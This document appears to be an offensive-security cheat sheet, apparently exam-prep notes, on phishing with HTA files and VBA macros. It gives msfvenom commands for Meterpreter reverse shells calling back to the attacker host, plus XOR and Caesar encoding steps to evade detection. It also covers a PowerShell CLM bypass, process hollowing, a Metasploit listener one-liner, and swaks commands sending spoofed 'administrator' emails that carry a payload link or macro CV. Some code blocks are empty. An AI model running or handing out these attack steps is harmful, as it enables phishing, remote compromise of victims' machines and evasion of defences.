# Phishing # HTA payloads ## Ping ```bash ``` ### TCPdump To catch the ping ```bash sudo tcpdump -i tun0 icmp ``` ## HTA - Bypass CLM 1. Compile the project [https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/02.CLM/revshell/PSBypassCLM) 2. Convert to psby.txt using certutil ```csharp certutil -encode "Z:\\tools\\02.CLM\\revshell\\PSBypassCLM\\PSBypassCLM\\bin\\x64\\Release\\PsBypassCLM.exe" psby.txt ``` 3. Download the psby.txt on the kali host and serve the file with a dropper ```csharp ``` ## HTA - With Meterpreter 1. Generate the shellcode ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f csharp EXITFUNC=thread ``` 2. Run it through [XORme](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/00.encoders/XORme) 3. Update [hollow.xml](https://github.com/blu3drag0nsec/osepvs/blob/main/tools/04.processhollowing/hollow.xml) with the code from above 4. Set up listener ```csharp msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" ``` 5. Deliver it ```csharp ``` # Macro VBA 1. Generate the shellcode ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp ``` 2. Run it through [caesar cypher](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/00.encoders/vba-caesar) - pay attention to `shift` and `key` parameters. 3. Set up listener ```bash msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443;set exitfunc thread; exploit -j" ``` 4. Update the [vba](https://4259749503-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIjMGokTUMT5MhpNldrsd%2Fuploads%2Fgit-blob-a682776c87af9345bc612d01077f47198088f48c%2Foffice-vba-macro.txt?alt=media) with your shellcode from step 2. # Sending emails ## swaks ### HTA payloads ```bash swaks --body 'Please check this issue here http://YOUR_IP/payload.hta' --add-header "MIME-Version: 1.0" --add-header "Content-Type: text/html" --header "Subject: Issues with my account" -t Will@domain.com -f administrator@domain.com --server EMAIL_server ``` ### Macro payloads ```bash swaks --to jobs@domain.com --from administrator@domain.com --header "Subject: My CV" --body "Attached my cv to this email" --attach @cv.docm --server server.domain.tld ```